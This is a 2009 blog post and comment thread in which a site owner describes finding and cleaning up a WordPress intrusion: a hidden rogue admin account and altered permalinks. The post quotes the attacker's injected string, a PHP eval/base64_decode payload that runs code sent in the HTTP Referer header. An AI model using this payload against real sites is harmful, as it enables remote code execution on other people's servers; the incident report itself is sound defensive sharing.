LinuxSoftware

Coding and tramping in Aotearoa / New Zealand

Sep 4

Intrusion detected

david, Friday, 9:46 pm

So after saying recently I didn’t think WordPress was that bad for security holes, I find my links on this blog started showing up with strange strings like /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&% on the end.

Looking in the database I see permalinks had been changed to add that string.

I’ve seen a few users registering for my blog, which I thought was odd as users who register have no special rights.  But looking at my list of users I have a new Admin user there :-( .  And thanks to some sneaky Javascript for a first name they don’t show up in the list of users.

So I have upgraded my version of WordPress, changed my passwords, deleted the intruder’s user, and changed back the permalinks.  Hope this will defeat the attacker.

3 Responses to “Intrusion detected”

  1. Andrew says:
    September 6th, 2009 at Sunday, 4:29 pm

    WordPress seems to be targeted more and more. It’s a pain in the neck keeping up with upgrades every month or so, if I was starting again I would probably just use the WordPress hosting service.

    I don’t know why, but the automatic upgrade plugin stopped working for me several versions ago. Upgrading manually isn’t too bad, I just live in fear of screwing it up and losing data.

    My site has never been hacked – I think the secret is to have a really unpopular blog that nobody will bother with.

  2. Simon says:
    September 7th, 2009 at Monday, 1:39 pm

    I just updated my WordPress too in the weekend after reading on Slashdot about some security issues.

  3. david says:
    September 9th, 2009 at Wednesday, 9:55 am

    I found that intrusion just as I was leaving to go tramping for three days. (Isn’t it always like that.) Am glad to see I haven’t come back to a site full of spam and spyware. I’m not sure that the attack that was being used was working anyway as PHP wasn’t evaluating that “eval(base64_decode($_SERVER[HTTP_REFERER]))” string the way the attacker obviously hoped it would.

    To be honest I was relying on yum update to keep my WordPress package up to date, but had missed that the version of Fedora I’m running here (8) has since passed into the unsupported land. So I should really upgrade the OS too, but I’m looking at changing to cheaper hosting as another option.

    @Andrew: sandfly.net.nz has a higher Alexa rank 3,293,976 than linuxsoftware.co.nz 4,015,988. I’m sure the spammers would love to deface it.

Leave a Reply